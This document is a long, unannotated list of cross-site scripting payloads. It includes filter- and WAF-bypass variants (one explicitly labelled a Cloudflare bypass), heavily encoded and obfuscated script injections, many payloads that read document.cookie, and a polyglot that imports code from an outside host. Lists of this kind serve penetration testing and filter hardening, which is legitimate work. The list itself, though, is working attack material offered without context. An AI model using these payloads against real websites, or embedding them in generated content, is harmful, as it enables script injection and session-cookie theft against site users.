<link rel="stylesheet" href="#" onload="window.alert('XSS_WAF_BYPASS')">
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
"><img src=x onerror=prompt(document['domain']);>.asp
"><img src=x onerror=prompt(document['domain']);>.aspx
"><img src=x onerror=prompt(document['domain']);>.php
"><img src=x onerror=prompt(document['domain']);>.html
"><img src=x onerror=prompt(document['domain']);>.htm
"><svg onload=prompt(document.domain);>.asp
"><svg onload=prompt(document.domain);>.aspx
"><svg onload=prompt(document.domain);>.php
"><svg onload=prompt(document.domain);>.html
<!--><svg onload=alert(1)-->.asp
<!--><svg onload=alert(1)-->.aspx
<!--><svg onload=alert(1)-->.php
<!--><svg onload=alert(1)-->.html
"><img src=x onerror=prompt('document.domain');>.asp
"><img src=x onerror=prompt('document.domain');>.aspx
"><img src=x onerror=prompt('document.domain');>.php
"><img src=x onerror=prompt('document.domain');>.html
"><img src=x onerror=prompt('document.domain');>.htm
<script>alert(1)</script>.asp
<script>alert(1)</script>.aspx
<script>alert(1)</script>.php
<script>alert(1)</script>.html
<script>alert(1)</script>.htm
<ScRiPt>alert(1)</ScRiPt>
<s%00c%00r%00i%00p%00t>alert(1)</script>
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
<img src="x" onerror="alert(1)">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
%3cscript%3ealert(1)%3c/script%3e
&#60;svg/onload=alert(1)&#62;
&#60;script&#62;alert(1)&#60;/script&#62;
--><svg onload=alert(1)>
aaaaa\”-confirm`1`//
\”-confirm`1`//
%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E
";}(document.writeln(decodeURI(location.hash))-"#<iframe src=javascript:alert(document.domain)
javascript://%250Aalert(1)
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><track/onerror='confirm`1`'>
<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
eval('alert(1)');
\u0061\u006c\u0065\u0072\u0074(1)
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
'"><script>alert(2);</script>
%3E'><script>alert(2);</script>
%22-[9].every(alert)-%22//
%22%3E'><script>alert(2);</script>
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
%27%3E'><script>alert(2);</script>
%22%27%3E'><script>alert(2);</script>
'>  <script>alert(2);</script>
'>'><SCript>alert(2);</script>
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
'>👽💻🔥<script>alert(2);</script>
'>'+'><script>alert(2);</script>
&#62;'&gt;"<script>alert(2);</script>
'&#x3E;'>"><script>alert(2);</script>
<img src=x onerror=alert('from\u0020subcat\u0020title')>
"><img src=a onerror=alert(document.location)>
"><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)​>
"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
'\u003E'\u0022><script>alert(2);</script>
'>'\n><script>alert(2);</script>
'&#x3E;'><script>alert(2);</script>
'>&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--
'><!--"/><style>@import 'data:text/css;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKSk=';</style><b><!--
'>&lt;/b&gt;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb&gt;&lt;!--
'\u003e\'</b><script>alert(document.cookie)</script><b><!--'
'+ '</b><script>alert(document.cookie)</script><b><!--'
(function(){alert(document.cookie)})();
"alert(document.cookie)['script'](2);"
'});alert(document.cookie);//'
'><scr'+'ipt>alert(document.cookie)</scr'+'ipt><b><!--
');alert(document.cookie)();//
'\u0029\u0028};alert(document.cookie);//"
"><svg/onload=alert(1);>
"><iframe onload=alert(1);>
"><audio onplay=alert(1);>
"><img src="javascript:alert(1);" />
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E
%3C%25%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%2522%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
"><img src=x onerror=prompt(document.domain);<<
"><img src=x onerror=prompt(document['domain']);>
"><img src=x onerror=this.innerHTML=''><script>alert(document.domain)</script>">
"><img src=x onerror=eval('prompt(document.domain)')>
"><img src=x id="img"> <script>document.getElementById('img').addEventListener('error', function(){prompt(document.domain);})</script>
"><img src=x onerror=prompt(document.domain);>
"><img src=x><img src= onerror=prompt(document.domain);>
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRy
&quot;&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
%253C%2531%2533%2533%253E%253C%2539%253E%253C%2569%253D%2538%253B%253E%253C%253F%256A%2532%253E%253C%252F%2563%253E%253C%252F%2573%2563%2568%2572%2569%2570%2574%253E
&lt;&lt;img src=x onerror=prompt(document)&gt;&gt;;
"><img\ src=x\ onerror=prompt(document.domain);>
"><img src=x onerror="prompt(document.domain);">
"><img src=x onerror=prompt(document&#46;domain);>
"><img src=x onerror=prompt(document%2Edomain);>
"><img src=x onerror=prompt(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110));>
"><img src=x onerror=prompt(unescape('document%2Edomain'));>
"><svg onload=prompt(document.domain);>
"><img src=x onerror=prompt(document.domain); title=x>
"><div style="background-image: url(x)" onerror=prompt(document.domain);>
"><script>var img=document.createElement('img');img.src='x';img.onerror=function(){prompt(document.domain);};document.body.appendChild(img);</script>
<scr'+'ipt>alert(1)</scr'+'ipt>
\<script\>alert(1)\<\/script\>
<script>alert\u00281\u0029</script>
%3Cscript%3Ealert(1)%3C/script%3E
"><IMG SRC=x ONERROR=prompt(document.domain);>
"><img src=/x onerror=prompt(document.domain);>
"><img src="x" onerror="prompt(document.domain);">
"><img src='x' onerror='prompt(document.domain);'>
"><img src=x onerror=(prompt(document.domain));>
"><img src=x   onerror=prompt(document.domain);>
"><img src=x&#9;onerror=prompt(document.domain);>
"><img src=x onerror=prompt('document.domain');>
"><img src=x id=img> <script>document.getElementById('img').addEventListener('error',function(){prompt(document.domain);})</script>
"><img src=x style=content:'x' onerror=prompt(document.domain);>
"><img src=data:, onerror=prompt(document.domain);>
"><img src=x alt=x onerror=prompt(document.domain);>
%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E
"><img src=x ONERROR=prompt(document.domain);>
"><img src=x onmouseover=prompt(\u0064ocument.domain);>
"><link rel="stylesheet" href="style.css"><img src=x onerror=prompt(document.domain);>
"><svg><img src=x onerror=prompt(document.domain);></svg>
'--><img src=x onerror=prompt(document.domain);><!--
"><img/src/onerror=alert(`ibro`)>
"<div style="background-image: url(x)" onerror=prompt(document.domain);>
\"><img src=x onerror=prompt(document.domain);>
"><img src:x onerror=prompt(document.domain);>
"><img src=x\%28\%29\ onerror=prompt(document.domain);>
">&lt;img src=x onerror=prompt(document.domain);&gt;
"%3E<img src=x onerror=prompt(document.domain);%3E"
"><img src=x onerror=prompt(document.domain);String.fromCharCode(62);">
">\<img src=x onerror=prompt(document.domain);\>\;\>\<\>"
%0d%0a%0d%0a<script>alert(document.domain)</script>
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
javascript:alert(1);/////
"><img src=x onerror='alert(document.domain)'>
'"/><img src= x onerror='alert(document.domain)'>
'"/><img src= x onerror=prompt(/xss/)>
<img src='test' onmouseover='alert(2)'>
/><script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script>
</style></script><script>alert("XSS")</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
<ScRipt>ALeRt("hi");</sCRipT>
"};alert(23);a={"a":
#<><img src=1 onerror=alert(1)>
"></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdYU1MgUE9DIGJ5IERFREknKTwvc2NyaXB0PiJ9
><sVg%2Fonload%3Dalert%281%29+class%3Dikhsan>
q="><img/src/onerror=.1|alert`` class=d>
search?q=javascript:alert(document.domain)
#javascript:alert(document.domain)
<><img src=1 onerror=alert(1)>
<img src=1 onerror=print()>
%27x%27onclick=%27alert(1)
</script><script>alert(1)</script>
"><sVg%2fonload%3dalert%2ebind%28%29%281%29%20class%3dRahul-Dh>
“><img only src=1 onerror=alert()>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>
<Img Src=OnXSS OnError=prompt(document.cookie)>
</script><svg/pnload=prompt(1)>
<sCript>confirm()</sCript>
"><SVG ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)>
%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e
<img src=x onerror=prompt()>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76-->
javascript:var{a:onerror}={a:alert};throw%20document.domain
<svg onload=alert(1)//
java%0d%0ascript%0d%0a:alert(document.domain);//
&lt;img src=x onerror=alert()>
\'-alert(1)//
#\'-alert(1)//
-alert(1)-&apos;
' onerror='alert("xss")'>
<img src="invalid-image" onerror="alert('XSS');">
#<img src="invalid-image" onerror="alert('XSS');">
<img src=x onerror="prompt(1)">aaaaaaaaaaaa
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
</script><svg/onload=alert(0)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"<IMG DYNSRC=\"javascript:alert('XSS');\">"
secbreake@gmail.com\u003C/script...
test<i>test</i><a onmouseover="alert(document.cookie)">
//j\\javascript:alert(document.domain)
<p><img/src/onerror=alert(`ibro`)></p>
('+'alert(1)+')();
.alert(1);
'></script><svg/onload=alert(document.cookie)>
//j%5c%5cjavascript%3aalert(document.domain)
javascript:(alert('XSS Success!'))()
#javascript:(alert('XSS Success!'))()
#"><svg onload=alert(1)>
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
嘼img src=1 onerror=alert(1)嘾
嘾嘾<script>alert(2);</script>
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
嘼"><svg onload=prompt(document.domain);>
%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
"><u>XSS</u><marquee+onstart='alert(document.cookie)'>XSS
{{window['eval'](window['atob'](window['decodeURIComponent']('Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy')))}}
data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
///%01javascript:alert(document.cookie)/
javascript:alert(document.domain);
xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;
</b><script>alert(document.cookie)</script><b><!--
</title><script>alert(document.domain)</script>
ryp3i"accesskey="x"onclick="alert(1)"//opk15
#<ScRiPt>alert(1)</ScRiPt>#
"'><svg/onload=confirm(666)>
#"'><svg/onload=confirm(666)>
'x'%20onclick='confirm`1`'
'confirm(document.domain)'>
#'confirm(document.domain)'>
#</script><script>alert(1)</script>
;</script><embed/test='asdf'/sr%00c='/'>
"><svg onmouseover="confirm&#0000000040document.domain)
${alert(1)}
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
https://me6.com/aem/xss2.svg
<Img Src=OnXSS OnError=confirm(1)>
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<svg></p><style><g title="</style><img src onerror=alert(document.domain)>">
"/>"/><img src=xss onerror=alert(2)>
/><svg src=x onload=confirm(document.domain);>
</h1><script>alert(1)</script><h1>
</script><body/onload=alert(m3ez)>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
"onmouseover="alert(document.cookie)"><!--
<script>alert(1234)</script>
<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
#/<script>alert(1234)</script>
<IMG+DYNSRC="javascript:alert(1);">
<IMG+LOWSRC="javascript:alert(1);">
<isindex+type=image+src=1+onerror=alert(1)>
<meta style="xss:expression(open(alert(1)))" />
<!</textarea <body onload='alert(1)'>
<img+<iframe ="1" onerror="alert(1)">
<base+href="javascript:alert(1);//">
<bgsound+src="javascript:alert(1);">
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
<object+data="javascript:alert(0)">
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
%3E%3Cbody%20onload=javascript:alert(1)%3E
'">><marquee><h1>1</h1></marquee>
</br style=a:expression(alert(1))>
<font style='color:expression(alert(1))'>
<embed src="data:image/svg+xml;>
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex action=javascript:alert(1) type=image>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
</a onmousemove="alert(1)">
'%26%26'javascript:alert%25281%2529//
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
12&<script>alert(123)</script>=123
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=/ onerror=alert(1)>
<img/src="xss.png"alt="xss">
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
foo%00<script>alert(document.cookie)</script>
x"><svg%0Donload="window['alert'](document.cookie)">
x'><svg%0Donload='window["alert"](document.cookie)'>
x"><svg%0Donload="window['alert'](document['cookie'])">
x"><svg%0Donload="window['alert']((document)['cookie'])">
x\"><svg%0Donload=\"window[\'alert\']((document)[\'cookie\'])\">
x"><svg%0Donload=`window['alert']((document)['cookie'])`>
x"><svg%0Donload=`window["alert"](((document)['cookie']))`>
"><<script>alert(document.cookie);//<</script>
><s"%2b"cript>alert(document.cookie)</s"%2B"cript>
#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
<script>alert(['X','S','S'].join(''))</script>
3Cscript%3Ealert(1)%3C%2Fscript%3E
%253Cscript%253Ealert(1)%253C/script%253E
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%BCscript%BEalert(%A21%A2)%BC/script%BE
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
<svg onload=alert&#0000000040document.cookie)>
";(a=alert,b=1,a(b))
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"
x"><svg%0Donload="window['alert'](document['cookie'])"
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<a+href="javas&#99;ript&#35;alert(1);">
<IMG+SRC=j&#X41vascript:alert(1)>
<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>
<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>
alert(String.fromCharCode(88))</SCRIPT>
&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
"+style%3d"x%3aexpression(alert(1))+
\";alert(1);//
#\";alert(1);//
<img src="x:%90" title="onerror=alert(1)//">
"+onkeypress="prompt(23)"+
"+onfocus="prompt(1)"+
alert(document['cookie'])
#alert(document['cookie'])
with(document)alert(cookie)
";location=location.hash)//#0={};alert(0)
";alert(String.fromCharCode(88,83,83))
"+onDblClick=prompt(123)"+
"+onError=prompt(123)"+
";eval(unescape(location))//#%0Aprompt(0)
%'});%0aalert(1);%20//
<IMG+SRC="jav&#x0A;ascript:alert(1);">
<IMG+SRC="jav#x0D;ascript:alert(1);">
"jav&#x09;ascript:alert(1);">
#"jav&#x09;ascript:alert(1);">
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
<script%00>alert(1)</script%00>
<scr%00ipt>prompt(1)</sc%00ript>
%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
<*script>prompt(123)<*/script>
<script%20TEST>alert(1)</script%20TESTTEST>
<<SCRIPT>alert(1);//<</SCRIPT>
<script>a\u006cert(1);</script>
<script>eval(‘a\u006cert(1)’);</script>
<script>eval(‘a\x6cert(1)’);</script>
<script>eval(‘a\154ert(1)’);</script>
<script>eval(‘a\l\ert\(1\)’);</script>
<script>eval(‘al’+’ert(1)’);</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41));</script>
<script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script>
<script>’alert(1)’.replace(/.+/,eval)</script>
<script>function::[‘alert’](1)</script>
<script>alert(document[‘cookie’])</script>
<script>with(document)alert(cookie)</script>
<script><script>alert(1)</script>
<scr<script>ipt>alert(1)</script>
<scr<object>ipt>alert(1)</script>
</script><script>alert(1)</script>
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
javascript:eval(unescape(location.href))
1&"><script>alert(1)</script>=1
#1&"><script>alert(1)</script>=1
</scr</script>ipt><ifr<iframeame/onload=prompt()>whs
<script>alert(“xss”)</script>
<img src=x onerror=alert(“falcon”)>
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<body onload=alert(“bingo”)>
#<body onload=alert(“bingo”)>
<Script>alert()</Script>
<svg/onload=alert(“Hacked”)>
#<svg/onload=alert(“Hacked”)>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
"onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
%20<script>alert(1)</script>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script>
%0d%0a%20<script>alert(1)</script>
%3F%20<script>alert(1)</script>
%20"><svg onload=alert(1)>
%E5%98%8D%E5%98%8A%20"><svg onload=alert(1)>
%0d%0a%20"><svg onload=alert(1)>
%3F%20"><svg onload=alert(1)>
%20<img src=1 onerror=alert(1)>
%E5%98%8D%E5%98%8A%20<img src=1 onerror=alert(1)>
%0d%0a%20<img src=1 onerror=alert(1)>
%3F%20<img src=1 onerror=alert(1)>
%20javascript:alert(1)
%E5%98%8D%E5%98%8A%20javascript:alert(1)
%0d%0a%20javascript:alert(1)
%3F%20javascript:alert(1)
%20"><img src=q onerror=alert(1)>
%E5%98%8D%E5%98%8A%20"><img src=q onerror=alert(1)>
%0d%0a%20"><img src=q onerror=alert(1)>
%3F%20"><img src=q onerror=alert(1)>
%20"><img src=x onerror=prompt(document.domain);>
%E5%98%8D%E5%98%8A%20"><img src=x onerror=prompt(document.domain);>
%0d%0a%20"><img src=x onerror=prompt(document.domain);>
%3F%20"><img src=x onerror=prompt(document.domain);>
%20<script>prompt(document.domain)</script>
%E5%98%8D%E5%98%8A%20<script>prompt(document.domain)</script>
%0d%0a%20<script>prompt(document.domain)</script>
%3F%20<script>prompt(document.domain)</script>
%20<img/src/onerror=alert(ibro`)>
%E5%98%8D%E5%98%8A%20<img/src/onerror=alert(ibro`)>
%0d%0a%20<img/src/onerror=alert(ibro`)>
%3F%20<img/src/onerror=alert(ibro`)>
%20<body onload=alert("bingo")>
%E5%98%8D%E5%98%8A%20<body onload=alert("bingo")>
%0d%0a%20<body onload=alert("bingo")>
%3F%20<body onload=alert("bingo")>
%20%3Cimg%20src=1%20onerror=alert(1)%3E
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
#';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
<img \x00src=x onerror="alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src onerror /" '"= alt=javascript:alert(1)//">
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script-->
<!--xss"><img src=x onerror=alert(1)>-->
<!--[if<img src=x onerror=javascript:alert(1)//]>-->
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<body language=vbs onload=confirm-1
"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>"
"\"><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>",
<button autofocus onfocus=confirm(2)>
'`"><*chr*script>log(*num*)</script>
"><img src="/" =_=" title="onerror='prompt(1)'">
<img language=vbs src=<b onerror=confirm#1/1#>
"]<img src=1 onerror=confirm(1)>
#"]<img src=1 onerror=confirm(1)>
/#<img src=1 onerror=javascript:confirm(3)>
"><img src=javascript:while([{}]);>
<img/ src//'onerror/''/=confirm(1)//'>
"\"><img src=\"x\" onerror=\"confirm(0)\"/>",
<img src=x onerror=URL='javascript:confirm(1)'>
#<img src=x onerror=URL='javascript:confirm(1)'>
"><img src=x onerror=prompt(1);>
"><img src=x onerror=confirm('x') />]
"><img src=x onerror=prompt(document.cookie);>
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie%2529%253B%253E
Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7Pg==
<img src=xx: onerror=confirm(document.location)>
<--`<img/src=` onerror=confirm(1)> --!>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
><imgsrc=x onerror=confirm.onerror=confirm(1)>
"><input value=<><iframe/src=javascript:confirm(1)
</plaintext\></|\><plaintext/onmouseover=prompt(1)
"<script>1-confirm(0);</script>"/>
"/><script>+-+-1-+-+confirm(1)</script>
<script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script>
<script>+-+-1-+-+confirm(1)</script>
"<script>'confirm(0)%3B<%2Fscript>"
"\"><script>'confirm(0)%3B<%2Fscript>",
<script>'confirm(0)%3B<%2Fscript>
"'`><script>log*chr*(*num*)</script>
</script><svg onload='-/"/-confirm(1)//'"
<script>x=""-prompt(9)-"";y=42;</script>
<svg id=1 onload=confirm(1)>
#<svg id=1 onload=confirm(1)>
<svg onload=confirm(1)
"><svg onload="confirm(7)">
<svg onload="confirm(7)">
<svg onload=eval(URL)>
<svg onload=eval(document.cookie)>
<svg onload=eval(window.name)>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"`'><script>\x09javascript:alert(1)</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="('XSS')"
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
Set.constructor`alert\x28document.domain\x29
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
#<iframe src="javascript:alert('XSS');"></iframe>
#<body onload="alert('XSS')">
d="alert('XSS');\")";
echo('IPT>alert("XSS")</SCRIPT>'); ?>
